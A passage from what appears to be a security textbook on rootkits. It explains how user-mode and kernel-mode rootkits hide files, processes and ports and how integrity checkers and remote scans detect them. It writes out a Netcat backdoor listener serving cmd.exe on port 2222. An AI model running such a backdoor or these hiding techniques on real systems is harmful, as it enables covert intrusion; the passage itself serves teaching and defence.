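    min_len or more consecutive printable ASCII characters."""
    return [m.decode() for m in re.findall(rb"[ -~]{%d,}" % min_len, data)]

# An intact backdoor password embedded in a binary stands out ...
binary = b"\x7fELF\x00\x00" + b"s3cretpw" + b"\x00\x90\x90"
found = strings(binary)          # ['s3cretpw']

# ... but the same password split up and reassembled only at runtime
# never appears as a consecutive run of characters in the file.
split_binary = b"\x7fELF\x00s3c\x00\x90ret\x00\x90pw\x00"
not_found = strings(split_binary)  # no fragment reaches min_len
```

The password “s3cretpw” here is, of course, a made-up example.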

Furthermore, when a user logs in to a Linux or UNIX system, the login and sshd programs normally record the newly authenticated user in the wtmp and utmp files. These accounting files are used by various programs, such as the who command, to show who is currently logged into the system. The rootkit versions of the login and sshd programs skip this critical step if the backdoor root password is used. Therefore, a system administrator that runs the who command will not be able to see the attacker logged in via the rootkit’s backdoors in login and sshd.

Linux/UNIX User-Mode Rootkits: Sniff Some Passwords

Once attackers have taken over one system, they usually install a sniffer to attempt to gather passwords and sensitive data going to other systems on the network. As described in Chapter 8, sniffers can be particularly effective for attackers trying to gain user IDs and passwords for other machines. Because of their usefulness, most rootkits include a simple sniffer that captures the first several characters of all sessions and writes them to a local file. By capturing the first characters of telnet, login, and FTP sessions, an attacker could gather the user IDs and passwords for numerous other users. An attacker can run the sniffer in the background and log in later to harvest the stored user IDs and passwords.

Linux/UNIX User-Mode Rootkits: Hide That Sniffer!

System administrators on many varieties of UNIX machines can run the ifconfig program to show the characteristics of the network interfaces, such as the IP address, network mask, and MAC address of each interface. When a sniffer runs on a system, it places the interface in promiscuous mode, gathering all data from the network without regard to its destination MAC address. On most UNIX variations, ifconfig also displays which interfaces are in promiscuous mode; unfortunately, Solaris and Linux systems with kernel 2.4 and later do not show promiscuous mode via ifconfig. On the UNIX varieties that do, the administrator can detect the sniffer by running ifconfig, as shown in Figure 10.11.

Figure 10.11 On some UNIX variations, ifconfig indicates sniffer use by showing the PROMISC flag.

Image

Of course, the attackers do not want the system administrators to discover their presence, so they counter this technique of searching for promiscuous mode. Most user-mode rootkits for UNIX include a Trojan horse version of ifconfig that lies about the PROMISC flag, preventing system administrators from detecting the rootkit.
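Because a Trojaned ifconfig can lie, one cross-check on modern Linux is to read the interface flags directly from the /sys filesystem and test the promiscuous bit yourself. This is a hedged sketch of my own: the /sys path is Linux-specific, it post-dates many of these rootkits, and it’s a cross-check rather than a guarantee (some modern sniffers don’t set this visible flag at all).

```python
IFF_PROMISC = 0x100  # promiscuous-mode bit, from Linux's if.h

def is_promiscuous(flags_value):
    """Test the promiscuous-mode bit in an interface's flags word.

    flags_value is the contents of /sys/class/net/<iface>/flags,
    a hex string such as '0x1103'."""
    return bool(int(flags_value, 16) & IFF_PROMISC)

# e.g., on a live Linux box (path assumed, interface name varies):
#   with open("/sys/class/net/eth0/flags") as f:
#       print(is_promiscuous(f.read()))
```

The point is the same as running a trusted md5sum from read-only media: go around the binaries an attacker is most likely to have replaced.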

Additional Linux/UNIX User-Mode Rootkit Hiding Techniques

The majority of rootkits replace far more than the login and sshd programs with backdoor versions and the ifconfig command that hides promiscuous mode. The same techniques applied to ifconfig for hiding critical evidence about an attacker’s presence are also employed against numerous other programs used by a system administrator. Table 10.6 shows some of the programs that are commonly replaced by Linux and UNIX rootkits to mask the attacker’s activities on the system.

Table 10.6 Programs Typically Replaced by Linux and UNIX Rootkits

Image

Each of these critical system programs is replaced with a Trojan horse alternative. Sure, they look and function like the normal programs, but they hide malicious behavior. Taken together, all of these Linux and UNIX programs are really the eyes and ears of a system administrator. They allow the administrator to determine what is happening on the system by examining network devices, the file system, and running processes. By replacing the system administrator’s eyes and ears, the attackers can very effectively hide their presence on a system.

User-Mode Rootkits: Covering the Tracks

Rootkits are designed to be as stealthy as possible, and include several techniques to mask the fact that a system is compromised. Many system administrators discover intrusions by observing changes in the last modified date of critical system files (like login, sshd, ls, ps, du, and other executables). Most user-mode rootkits for Linux and UNIX can alter the creation, modification, and last access time for any rootkit replacement files by setting these times back to their original value. The changes are undetectable, because the times are reset to the values they had before the rootkit was installed. Furthermore, using compression and padding routines, the rootkit replacements typically have the exact same size as the original executables.

Some Particular Examples of Linux/UNIX User-Mode Rootkits

A veritable zoo of user-mode rootkits is in widespread use today. A good sample of the diversity of rootkits can be found at www.packetstormsecurity.org/UNIX/penetration/rootkits, a location with more than 100 rootkit variations for numerous types of Linux and UNIX systems. The Linux RootKit 6 (lrk6), written by Lord Somer, is among the most fully featured rootkits available today. As its name implies, lrk6 targets Linux systems, and includes Trojan horse versions of the following programs:

Image

With all of these replacements, it’s a wonder anything is left standing on a system with lrk6.

The shv4 rootkit is another very popular user-mode rootkit for Linux that we have seen in many of our incident response investigations. Some versions of shv4 are incredibly easy to install, including a configuration program that loads, configures, and hides all Trojan horse executables with a single command. Even the backdoor login account name and password are automatically configured at the installation command line. The shv4 Trojan horse repertoire includes the following:

Image

Although this is a smaller number of replacements than lrk6, these shv4 rootkit alterations pack a powerful punch. Of the items in this list, the one that should jump out at you is the md5sum program. As we discussed earlier, this routine implements the MD5 hash algorithm, sometimes used by administrators to look for changes to critical system files. The shv4 rootkit replaces md5sum with a new version that lies about the MD5 hashes of certain other files included with the rootkit. Therefore, by running the built-in md5sum program on an shv4-infected system, the administrator will not notice any changes to the other programs included with the rootkit that the attacker configured the evil version of md5sum to disguise. Their MD5 hashes will appear (based on the lying md5sum replacement) to be the exact same values as before the rootkit was installed. To avoid this kind of problem, an administrator should run an md5sum program from trusted media, such as a CD-ROM or a write-lock protected USB memory drive. We’ll cover a couple of free CD-ROM images you can download for such analysis later in the chapter, when we address kernel-mode rootkits.

Windows User-Mode Rootkits

As we’ve seen, most Linux and UNIX user-mode rootkits replace critical operating system program files with evil substitutes. Most Windows user-mode rootkits opt for a slightly different approach: altering the memory of running processes associated with the operating system. By altering the memory of a running process, such as Task Manager or an executing netstat program, the attacker can hide processes and TCP and UDP port usage, without even changing the file associated with these executables on the hard drive. We’ve still got a user-mode rootkit, though, because the bad guy is altering the operating system components that users and administrators rely on. This change in tactics for Windows systems is caused by several factors, but two are paramount:

  • The difficulty Windows imposes on altering critical files in the file system. Starting with Windows 2000, Microsoft has included a built-in file integrity checker in Windows systems called Windows File Protection (WFP). This capability runs silently in the background, monitoring thousands of critical operating system files to see if they are changed in an unauthorized fashion. If WFP detects a change, it rolls back the original version of the file. Therefore, if an attacker replaces some critical files with rootkit versions, WFP quickly cleans up, and, in effect, uninstalls the rootkit. Although there are methods for disabling WFP, such tactics are not typically utilized, because it’s far easier to make a Windows rootkit without altering files on the file system.
  • The ease with which Windows lets one running process access another process. The Windows operating system includes various API calls that let one running process connect to and debug another running process, as long as the first process has debug rights. These rights are given to administrator accounts by default. Thus, an attacker can use an evil process running as administrator to connect to another running process, such as Task Manager. The evil process can then read and even change the memory inside the target process, overwriting software inside of that running process to change its behavior and capabilities.

Windows User-Mode Rootkit Hiding Tactics

Let’s analyze how a Windows user-mode rootkit can help an attacker hide on a Windows machine by altering running processes. First, we need to think about what an attacker might want to hide. The bad guys want to disguise their presence on a machine by making their malicious processes, files, Registry keys, and active TCP and UDP ports invisible to running programs on the machine. Most Windows applications used by administrators to look for these elements rely on a handful of API calls into the various Windows libraries, especially ntdll.dll, a big library used by many programs to interact with Windows itself. For example, the built-in Windows Task Manager makes various calls into certain critical libraries to determine which processes are running. Similarly, the dir command and Windows File Explorer use a specific set of API calls to determine which files are present on the machine. Likewise, regedit and netstat look for Registry keys and TCP and UDP ports, respectively, with certain calls. While each one of these programs is running, its process memory contains the code to invoke these functions so the program can display the system status.

A running rootkit can overwrite these API calls in each running process so that they point not to the normal Windows code to implement the function, but instead to the attacker’s own code. This process of using debug privileges to overwrite API calls in running processes is called API hooking. So a process like Task Manager will make an API call to get a list of running processes on the machine. Typically, Task Manager uses the NtQuerySystemInformation API call to get this list of processes. However, the rootkit process can overwrite this API call, so that Task Manager unknowingly accesses the attacker’s code. The attacker’s code will, likewise, get a list of running processes using the normal NtQuerySystemInformation API call. However, before giving the results back to Task Manager, the attacker’s code filters out certain processes from the list that the attacker doesn’t want the user to see. In effect, the attacker is wrapping the normal API handling code for NtQuerySystemInformation with the attacker’s own functionality. So, in the end, Task Manager will see only those running processes the attacker wants it to see.

Beyond Task Manager and the NtQuerySystemInformation API call, many Windows user-mode rootkits hook more than a dozen different API calls to hide various aspects of the system. Table 10.7 lists a handful of the most popular API calls on Windows machines that user-mode rootkits hook. It’s important to note that this list is a small sampling of some of the commonly hooked API calls. Some user-mode rootkits hook many additional API calls to hide on the system.

Table 10.7 A Small Sampling of Windows API Calls Hooked by Some Rootkits

Image

One of the more interesting items in Table 10.7 is the hook for the NtReadVirtualMemory call. Sometimes, investigators run debuggers to connect to running processes and interrogate memory for signs of API hooking, namely Windows API calls that have been overwritten with an attacker’s code. But investigators and their debuggers often rely on the NtReadVirtualMemory call to look for such signs of a rootkit. By hooking this API call, some rootkits attempt to thwart this style of investigation. When the NtReadVirtualMemory call is made, the attacker returns a normal-looking memory image to the debugger, masking any hints that the memory has been altered via API hooking. That’s very subtle, and an amazing feat of antidetection technology for the bad guys.

Implementing Windows User-Mode Rootkit Backdoors

In addition to API hooking for stealth capabilities, many Windows user-mode rootkits include a command-shell backdoor, similar in functionality to the Netcat command shell listeners we covered at the beginning of this chapter, offering up cmd.exe access across the network. It’s important to note that the backdoor program’s file, running process, and port number are all hidden using various API hooking mechanisms.

Some Particular Examples of Windows User-Mode Rootkits

One of the most popular user-mode rootkits for Windows is Hacker Defender (also known as hxdef), written by a rootkit designer who calls himself “holy father.” A nickname like that must make for interesting conversations with local clergy. Hacker Defender, located at http://hxdef.czweb.org, is designed not to defend a system against attackers. Quite the opposite is true, in fact. Hacker Defender is designed to defend the bad guys. The tool is centered around API hooking, which it uses to hide an enormous number of artifacts on a system that attackers might want to mask. Its features include the following:

  • Hiding files, processes, system services, system drivers, Registry keys and values, and TCP and UDP ports.
  • Lying to users and administrators about how much free space is available on the hard drive, so an attacker can mask the size of archives of pirated software, sniffed passwords, pornography, and other items the attacker has deposited on the system.
  • Hiding the alterations it makes to running processes when hooking APIs to thwart investigators using debuggers.
  • Creating a remotely accessible command-shell backdoor, made invisible on the local system through the API hooking mechanisms.
  • Implementing a relay that redirects packets across a network, obscuring their source, like the Netcat relays we covered in Chapter 8, and the remote-control backdoor capabilities we discussed in this chapter.

All of this functionality is achieved by a new service introduced into the system, called hxdef by default, that runs in the background and monitors system activities to make sure everything is hidden appropriately. Oh, and, of course, this hxdef process itself is hidden from view using the same API hooking procedures.

All of this action is controlled by a configuration file that is included with Hacker Defender. In this INI file, the attacker has to specify in advance each of the elements that needs to be hidden, using a convenient syntax, such as [Hidden Ports] TCP:port_num and [Hidden RegValues] reg_key_name. Although this configuration file format is pretty straightforward, it does take some getting used to. What’s more, if, after installing Hacker Defender, the attackers create any additional artifacts on the system, they have to remember to go back to the INI file and tweak it to hide their new items. If they forget to do so, a diligent system administrator might notice the attackers’ presence. To help alleviate this concern, an attacker can configure the INI file with wildcard characters, so that all files, processes, and Registry keys that start with a given sequence of characters will be hidden, regardless of when they are created after the rootkit is installed. By default, any of these items whose name starts with hxdef is hidden.

Figures 10.12a and 10.12b (on pages 600 and 601) show Hacker Defender in action. For this demonstration, the attacker ran a Netcat backdoor listener, which was named evilnc.exe, on TCP port 2222 ready to invoke cmd.exe on receiving a connection (using the syntax evilnc.exe -L -p 2222 -e cmd.exe, of course). As you can see in Figure 10.12a, before the rootkit is installed, we can see the Hacker Defender rootkit and its configuration file in the file viewer (named hxdef100). The netstat command shows TCP port 2222 listening for connections, and the evilnc.exe process is visible in Task Manager. Then, the attacker installed the rootkit simply by running its executable file with administrator privileges. After the rootkit is installed, in Figure 10.12b, the hxdef100 rootkit executable and configuration file, as well as TCP port 2222 and the evilnc.exe process, simply disappear. Yet, the evil Netcat backdoor continues to run, offering the attacker remote access to the box, well hidden by Hacker Defender.

Figure 10.12a. The system before Hacker Defender is installed.

Image

Figure 10.12b. The same system after Hacker Defender is installed.

Image

Besides Hacker Defender, another popular user-mode rootkit for Windows is the AFX Windows Rootkit, written by a developer who calls himself Aphex. This tool was originally released in 2003, but has been updated several times since then. As with Hacker Defender, the AFX Windows Rootkit uses API hooking techniques to hide files, processes, Registry keys, and TCP and UDP ports. What makes this tool special is its ability to create a hidden world for the attacker on the victim machine.

Remember how we mentioned earlier that an attacker has to carefully hide new artifacts by tweaking Hacker Defender’s INI configuration file? If the attacker gets sloppy, some artifacts won’t be hidden, giving a suspicious system administrator the ability to detect the attacker. The AFX Windows Rootkit avoids this concern in a particularly ingenious way: It centers everything around the concept of a single hidden directory. As illustrated in Figure 10.13, the attacker places the AFX Windows Rootkit executable in one directory on the victim machine and runs it. The rootkit then hides this rootkit directory from view. Then, everything else that happens from this rootkit directory is hidden. Any files or subdirectories created in the rootkit directory are hidden. Any executables that run out of the rootkit directory or its subdirectories will have hidden processes. Any Registry keys created by these invisible processes will be hidden. And, any TCP or UDP ports used by processes running out of the rootkit directory will be hidden. In other words, the attacker doesn’t have to remember to go back and hide any newly created artifacts on the system. As long as the bad guy works out of the hidden directory, all items will be automatically invisible on the machine. The rootkit maintains an inventory of artifacts on behalf of the attacker, and hides them in a systematic way. In a sense, the rootkit erects a cone of invisibility around the hidden directory, not letting system administrators or users see what is happening inside. The attacker therefore doesn’t need to configure the rootkit at all, because everything is hidden automatically.

Figure 10.13. The AFX Windows Rootkit creates a “cone of invisibility” centered around the rootkit directory.

Image

Defending Against User-Mode Rootkits

Don’t Let the Bad Guys Get Super-User Access in the First Place!

As we have seen, user-mode rootkits are quite powerful, and preventing their installation is certainly a worthwhile pursuit. As we’ve noted, an attacker must first conquer super-user access to install a rootkit. By preventing an attacker from getting root, SYSTEM, or administrator access in the first place, you prevent them from installing rootkits. Therefore, everything we’ve discussed about securing a system throughout this book, including using difficult-to-guess passwords, applying security patches, and closing unused ports, is very helpful in preventing attackers from gaining super-user access and installing rootkits. If you are a system, security, or network administrator, your organization must have a defined security program in place for hardening systems and maintaining their security.

One set of tools that can help you harden your systems is created by the Center for Internet Security (CIS), a volunteer group focused on improving the security state of systems on the Internet. Their hardening templates, available for free at www.cisecurity.org, are a great starting point for improving the security of your systems. They’ve released hardening templates for Windows 2000, Windows XP, Solaris, HP-UX, Linux, Cisco routers, and even Oracle databases, among other system types. Each template provides dozens and in some cases hundreds of tweaks of various operating system and infrastructure settings to harden the systems beyond their default stance. Keep in mind, however, that these templates are merely a starting point; one size doesn’t necessarily fit all. For example, the Windows XP template offered by CIS might harden your system so much that your particular mix of applications can no longer function, given its reliance on default system settings. At the same time, their Linux template might not harden a system enough to meet your super-duper, ultra-tough security needs. That’s not to say that their Windows XP settings are particularly strong or their Linux ones are weak. All of their templates were created by a consensus among large numbers of people to fit “typical” environments. Thus, start with the CIS templates and tweak them appropriately to meet your needs. As a bonus, CIS offers free scoring tools to compare your existing configurations to the CIS templates, so you can see how out of joint or in the groove you already are.

File Integrity Checkers

Unfortunately, even if you keep your system hardened, an attacker might still find some unknown hole in your system, gain root, and install a rootkit. There is no such thing as 100 percent security; flaws in information protection schemes happen. So how can you detect a rootkit once it is installed? As we have seen, the computer underground has very carefully designed rootkits to foil detection. However, all is not lost. We can pierce their veils of secrecy.

One of the best ways to detect user-mode rootkits is to use cryptographically strong digital fingerprint technologies to periodically verify the integrity of critical system files. A file integrity checking tool does just that, and is very helpful in protecting systems against user-mode rootkits. By calculating cryptographic fingerprints of sensitive system files and comparing them against a trusted base of good fingerprints, a file integrity checker can detect alterations made by an attacker who has replaced files, altered libraries, or even included nasty new stuff in critical system directories. These tools use one-way hash functions, such as MD5 and SHA-1, to create a unique sequence of bits (a digital fingerprint, essentially) based on the contents of a given file or directory. Because MD5 and SHA-1 are one-way hash functions, an attacker will not easily be able to determine how to modify the file in such a way that its MD5 and SHA-1 fingerprints remain the same. Therefore, a system or security administrator should create a read-only database of cryptographic hashes for critical system files, store these hashes offline, and periodically compare hashes of the active programs to the stored hashes, looking for changes.

When deploying a file integrity checker in this way, I strongly encourage you to configure the tool to create hashes using at least two separate hashing algorithms, such as both MD5 and SHA-1. Some recent research has indicated weaknesses in both MD5 and SHA-1 hashes that could allow an attacker to create two different executables with the same MD5 or SHA-1 hash, a problem known as a hash collision. Yet, although both MD5 and SHA-1 have had some problems discovered, it remains pretty darned unlikely that someone could purposely create collisions in both MD5 and SHA-1 at the same time, so you can get a reasonable level of protection by applying two or more hash algorithms in parallel. That is, run both MD5 and SHA-1 hashes and use your file integrity checking tool to automatically look for discrepancies. The particularly paranoid reader might want to consider running a file integrity checking tool that uses one or more hash algorithms in addition to MD5 and SHA-1, such as RIPEMD-160. Most of today’s tools support MD5 and SHA-1. In the future, additional algorithms will likely be added.
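As a minimal sketch of this dual-hash approach, the following Python fragment computes MD5 and SHA-1 fingerprints in parallel and flags any file whose current fingerprints differ from a trusted baseline. Real tools like Tripwire add policy languages, signed databases, and scheduling on top of this core idea; the function names here are my own illustration, not any tool’s API.

```python
import hashlib
from pathlib import Path

def fingerprints(path):
    """Compute MD5 and SHA-1 digests of a file in a single pass."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()

def build_baseline(paths):
    """Record trusted fingerprints; store the result offline, read-only."""
    return {str(p): fingerprints(p) for p in paths}

def check(baseline):
    """Report files whose current hashes differ from the trusted baseline."""
    altered = []
    for path, trusted in baseline.items():
        if not Path(path).exists() or fingerprints(path) != trusted:
            altered.append(path)
    return altered
```

Because both digests must match the baseline, a forged file would need simultaneous MD5 and SHA-1 collisions to slip past this check.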

Tripwire is a wonderful file integrity checking tool originally written by Gene Spafford and Gene Kim of Purdue University. Tripwire generates hashes of critical files and directories. On a Linux or UNIX system, Tripwire can look for changes in the login, sshd, ifconfig, ls, ps, and du files, among the many other executables frequently changed by user-mode rootkits. On a Windows machine, Tripwire can look for additions or changes to the critical system32 directory where many Windows rootkits drop executables and libraries that tweak the system’s behavior. A free version of Tripwire is available for noncommercial use on Linux at www.tripwire.org. Furthermore, Tripwire has been commercialized at www.tripwire.com, so commercial support is also available. Other free and open-source file integrity checking solutions include the Advanced Intrusion Detection Engine (AIDE) and Osiris. Beyond Tripwire, AIDE, and Osiris, more than a dozen other vendors sell file integrity checking solutions, including GFI Languard System Integrity Monitor, Ionx Data Sentinel, and others.

The trusted hashes or signatures created by any of these tools should be stored on read-only media (such as a write-protected USB token drive or a write-once CD-ROM). You should check the hashes of your critical executables against this safe database on a regular basis (such as hourly, daily, or weekly) and all changes must be reconciled with any normal system administration changes on the box. Of course, an integrity checking tool works best if you apply it before an attack occurs, so you have a secure baseline of hashes to compare against. If you are comparing the hash of a backdoor login or sshd executable with the hash of the same backdoor from a week earlier, you won’t detect any problems. You must compare against a trusted baseline, like the original system installation or a recent patch. Therefore, you must have a policy and processes regarding running file integrity checkers on all critical systems. To help establish a safe baseline, various organizations offer hashes of critical components of trusted versions of operating systems available for access on the Web. The Web site www.knowngoods.org has hashes for numerous Linux and UNIX system types. What’s more, the National Institute of Standards and Technology (NIST) offers a free database of various system hashes online via their National Software Reference Library (NSRL) at www.nsrl.nist.gov. This massive index includes the MD5 and SHA-1 hashes for more than 25 million different files associated with popular operating systems and applications.

When running a file integrity checker, make sure you analyze its output and reconcile all changes to critical system files. Why did your login program change? Did anything else change? Was it the result of a legitimate system patch or other upgrade a system administrator applied since you last ran the integrity check? If not, your system might have been rootkitted.

Uh-oh ... They Rootkitted Me. How Do I Recover?

If you detect a rootkit on your system, you have a significant problem. An attacker has gained super-user-level access to your system (after all, he or she needed super-user privileges to alter the operating system). When a system has a super-user compromise, it can be very difficult to determine all the files the attacker might have modified. Of course, your file integrity checking program will indicate which of your critical system files have been altered. So, can you simply replace those programs with the original, trusted versions? Unfortunately, the answer is “No.” The attacker might have laced your system with other backdoors and Trojan horse applications. Consider a scenario where the attacker gets in, installs a rootkit, and then starts modifying other applications (such as your database management system, your text editor, or even that Solitaire game included in your operating system) to reinstall the rootkit when they are executed. You might discover the rootkit using a file integrity checker. You methodically replace all of the files that the checker said were altered. However, your file integrity checker wasn’t configured to check your Solitaire executable, because it’s not considered a sensitive file. The next time some bored administrator runs Solitaire, the system gets re-rootkitted, and you won’t know until you run your file integrity checker again. Countless similar scenarios exist, demonstrating that manually cleaning up after a rootkit installation is difficult, if not impossible.

To be truly sure you eliminate all of the little surprises left by an attacker with super-user access, you should really completely reinstall all operating system components and applications, just to make sure the system is clean. You could rebuild the system from the original distribution media (CDs and downloaded patches). Alternatively, you could use the most recent trusted backup to restore the system. A trusted backup is an image of the system that is known to not have any system compromises. For example, your most recent file-integrity-checked backup can be trusted, because you used a file integrity checker to verify the integrity of the system files. For this reason, it is a great idea to synchronize your file system integrity checks with your backup procedures.

There are additional defenses against user-mode rootkits, including automated rootkit checkers and antivirus tools. However, such defenses help protect against not only user-mode rootkits, but also the nastiest form of Trojan horse backdoor we face on a regular basis today, kernel-mode rootkits. Therefore, we cover those additional defenses after exploring kernel-mode rootkits in detail.

Nastiest: Kernel-Mode Rootkits

We’ve seen the power of user-mode rootkits, but we’ve also seen how to defeat them using cryptographic integrity checks of our sensitive system files. But wait ... there’s more. The most recent evolutionary step in rootkits goes beyond the user-mode rootkit strategy of altering the executables, libraries, and processes that users rely on. Now, rootkits are increasingly being implemented at the kernel level, making them far more difficult to detect and control. Kernel-mode rootkits are a highly active area of development in the computer underground, with new examples being released on a regular basis.

In most operating systems (including various Linux and UNIX systems, as well as Windows), the kernel is the fundamental, underlying part of the operating system that controls access to network devices, processes, system memory, disks, and so on. All resources on the system are controlled and coordinated through the kernel. In other words, everything that happens on the system goes through the kernel to get work done in the real world. For example, when you open a file, your application sends a request to the kernel to open the file, which gathers the bits from the hard drive and passes them to your file-viewing application. Kernel-mode rootkits give an attacker complete control of the underlying system, a powerful position to be in for an attacker.

Back to our tired soup-eating analogy from Table 10.2. A user-mode rootkit replaces or alters the potatoes in your soup with genetically modified potatoes. A file-integrity checker (such as Tripwire) acts as a soup ingredient integrity checker, comparing the molecular structure of the potatoes in your soup to known, safe potatoes. However, kernel-mode rootkits modify your tongue, the organ you use to eat, so your soup ingredient checkers just don’t work any more. It’s much more difficult to tell if your tongue is poisonous than checking your soup and its ingredients. By modifying the underlying kernel itself, the thing you use to run programs, attackers can completely control the system at the most fundamental level, allowing them great power for backdoor access and hiding on the machine. The kernel itself becomes a Trojan horse, looking like a nice, well-behaved kernel, but in actuality being rotten to the core.

Figure 10.14 shows why kernel-mode rootkits are more devious than their user-mode siblings. Whereas a user-mode rootkit alters the eyes and ears of a system administrator (i.e., replacing applications such as login, sshd, ifconfig, and ls on Linux and UNIX or hooking APIs used by Task Manager, netstat, and the File Explorer on Windows), a kernel-mode rootkit actually alters parts of the system administrator’s brain. After all, many system administrators (myself included) feel that the kernel is an extension of our brains, controlling basic functions of the computer system, just like my brainstem keeps me breathing. Kernel-mode rootkits take advantage of this by modifying the kernel to transform the system completely and transparently to conform to the attacker’s needs. If the kernel cannot be trusted, you can trust nothing on the system.

Figure 10.14. Comparing user-mode rootkits with kernel-mode rootkits.

Image

The Power of Execution Redirection

What can attackers do with the power to manipulate your kernel? Many kernel-mode rootkits include a capability called execution redirection. This feature intercepts calls to run certain applications and maps those calls to run another application of the attacker’s choosing. It’s the classic bait-and-switch trap. The user or administrator says to run program foo, the kernel pretends to run foo, but then the kernel actually runs a different program called bar.

Think about the power of execution redirection! Consider a scenario involving the UNIX sshd routine. The attacker installs a kernel-mode rootkit and leaves the existing sshd executable file itself unaltered. All execution requests for sshd (which occur when anyone logs into the system using SSH) will be mapped to the hidden file /usr/sbin/backdoor_sshd. When a user tries to log in with SSH, the /usr/sbin/backdoor_sshd program will be executed, which contains a backdoor password allowing remote root-level access. However, when the system administrator runs a file integrity checker, the standard sshd routine is analyzed. Only execution is redirected; you can still look at the original sshd file and verify its integrity. This original routine is unaltered, so its cryptographic hash remains the same.

On a Windows machine, the bad guy can perform a similar execution redirection maneuver to the Task Manager or netstat executables. You think you are getting a good process list from a good Task Manager, and a truthful set of listening ports from a wholesome netstat program. And, in fact, these programs are indeed intact in the file system. But whenever you try to run Task Manager or netstat, the kernel pulls the rug out from under you, running an evil version of each program squirreled away somewhere in the file system. Again, your file integrity checker is none the wiser, because it will be looking at the intact Task Manager and netstat executables in your file system.

Execution redirection allows attackers to modify victim systems at their whim, while masking all of their alterations. The attacker creates an alternate universe in the victim computer that looks nice and happy. You can browse around your file system, look at various executables, and even calculate strong cryptographic hashes of them. Everything looks wonderfully intact. However, the system you are observing is a lie, because whenever you want to run a specific program, the kernel will run something else. You want to run sshd? You’ll actually run /usr/sbin/backdoor_sshd. You want to run Task Manager? You’ll actually run Hacked_Task_Manager. This execution redirection is some pretty nasty stuff, allowing an attacker to make any executable on your system a potential Trojan horse backdoor.
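Conceptually, the kernel’s execution redirection behaves like a lookup table consulted in the exec code path. The toy user-space Python sketch below illustrates only the mapping idea (the backdoor paths are the hypothetical examples from the text); a real rootkit implements this inside the kernel, not in a script.

```python
# Toy illustration of execution redirection -- NOT an actual rootkit.
# A kernel-mode rootkit consults a mapping like this deep in the kernel's
# exec path, silently swapping the requested binary for the attacker's.
REDIRECTIONS = {
    "/usr/sbin/sshd": "/usr/sbin/backdoor_sshd",  # hypothetical example from the text
    r"C:\Windows\system32\taskmgr.exe": r"C:\hidden\evil_taskmgr.exe",  # illustrative
}

def resolve_exec(requested_path):
    """Return the binary a rootkitted kernel would actually execute."""
    return REDIRECTIONS.get(requested_path, requested_path)
```

Note that a file integrity checker hashing /usr/sbin/sshd still sees the pristine file; only the execution request is diverted.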

A good image of the bizarreness that execution redirection introduces is the movie The Matrix. In that movie, the characters are exposed to two worlds: a computer-simulated world and reality. It is often difficult to determine during the movie whether the actors are in the real world or the computer simulation, leading to all kinds of cool plot twists. Kernel-mode rootkits with execution redirection are quite similar, in that you never know whether you are in fact running the program you think you are running or an attacker’s substitute. You just think you are executing a certain program, but it’s up to the hidden attacker to determine what is going on in reality, just like the evil programs in The Matrix. Your whole system could be a sham, a brilliant simulation of an intact operating system created by the bad guys to trick you into thinking that everything is okay, even though the system is rotten to the core, quite literally.

File Hiding with Kernel-Mode Rootkits

“Well,” you say, “I’ll just look for the /usr/sbin/backdoor_sshd, the Hacked_Task_Manager programs, or any other things the attacker adds to the file system.” Unfortunately, kernel-mode rootkits go beyond execution redirection. Many kernel-mode rootkits support file hiding. The attacker configures the victim machine so that anyone looking around the file system will see only what the attacker wants. Specific directories and files can be hidden. Sure, they’re still there on the system, and if you know about them, you can change directories, run executable files, and store data in those files, but you just cannot see them in a file listing.

This file hiding is implemented in the kernel, making it very efficient for the attackers. Although a user-mode rootkit replaced the ls program to hide files, the attacker has to worry that you might come along with another program to look at a list of files, such as the echo * command, which shows the contents of a directory on most Linux and UNIX systems. However, a kernel-mode rootkit can modify the kernel to lie to the intact ls program, the echo * command, and any other file listing command you attempt to run. Therefore, if you have any other applications that provide a file list (such as the Linux dir command, or the very useful lsof program), the kernel will lie to them as well about the contents of the file system, masking the attacker’s presence. Similarly, on a Windows machine, the attacker can alter the underlying Windows kernel to lie to your Windows File Explorer and dir commands to hide the bad guy’s items stored in your file system.

Process Hiding with Kernel-Mode Rootkits

Another common feature of kernel-mode rootkits is the ability to hide any running processes of the attacker’s choosing. The attacker might set up a Netcat backdoor listener, as described earlier in this chapter. To prevent detection of this running process, the attacker could use a kernel-mode rootkit to hide that Netcat process. Any application that tries to look at the process table (such as the ps or lsof commands in UNIX or Linux or the Task Manager in Windows) will get a wrong answer from the kernel, conveniently omitting the results the attacker doesn’t want you to see. The attacker can make any process just disappear, while it continues to run. If anyone asks about the process or a complete process list, the rootkitted kernel will lie and say that no such process exists.

Network Hiding with Kernel-Mode Rootkits

When a process listens on a specific TCP or UDP port, it can be detected using the command netstat -na, as we discussed in Chapter 6 and earlier in this chapter. This command relies on the kernel to determine which ports are currently active and listening. If an attacker runs a backdoor listener on the victim machine, the listening port will be displayed, discoverable by an investigator. To avoid such discoveries, many kernel-mode rootkits offer capabilities for masking particular network port usage. For example, the attacker can direct the kernel to lie about TCP port number 2222 when anyone asks for a port listing. Regardless of the program run on the local system to determine which ports are open (netstat or whatever else, such as lsof -i on UNIX or Linux or TCPView, ActivePorts, or Fport on Windows), the rotten kernel will mask the backdoor listener on this port.

Although network hiding fools all queries for network port usage run locally on the victim machine, a port scan across the network (using a tool like Nmap, as discussed in Chapter 6) will still show the listening port. A remote tool measuring open ports across the network is not blinded by the kernel, which can trick only the local commands run on the victim machine itself. Therefore, periodic scans of your own systems across the network are incredibly useful.
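A bare-bones version of such a remote check can be sketched in a few lines of Python using TCP connect attempts. A full scanner like Nmap does far more, of course, and as always, scan only machines you are authorized to test.

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Probe TCP ports from across the network. A rootkitted kernel on the
    target can lie to local tools like netstat, but it cannot hide a
    listener from this kind of remote measurement."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports
```

Comparing the remote scan results against the local netstat output is a simple way to spot a kernel that is hiding a port.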

Some Particular Examples of Kernel-Mode Rootkits

A wide variety of kernel-mode rootkits are available today. Let’s discuss a couple of the most powerful and useful examples: Adore-ng for Linux and FreeBSD and the FU rootkit for Windows.

Adore-ng: A Linux Kernel-Mode Rootkit

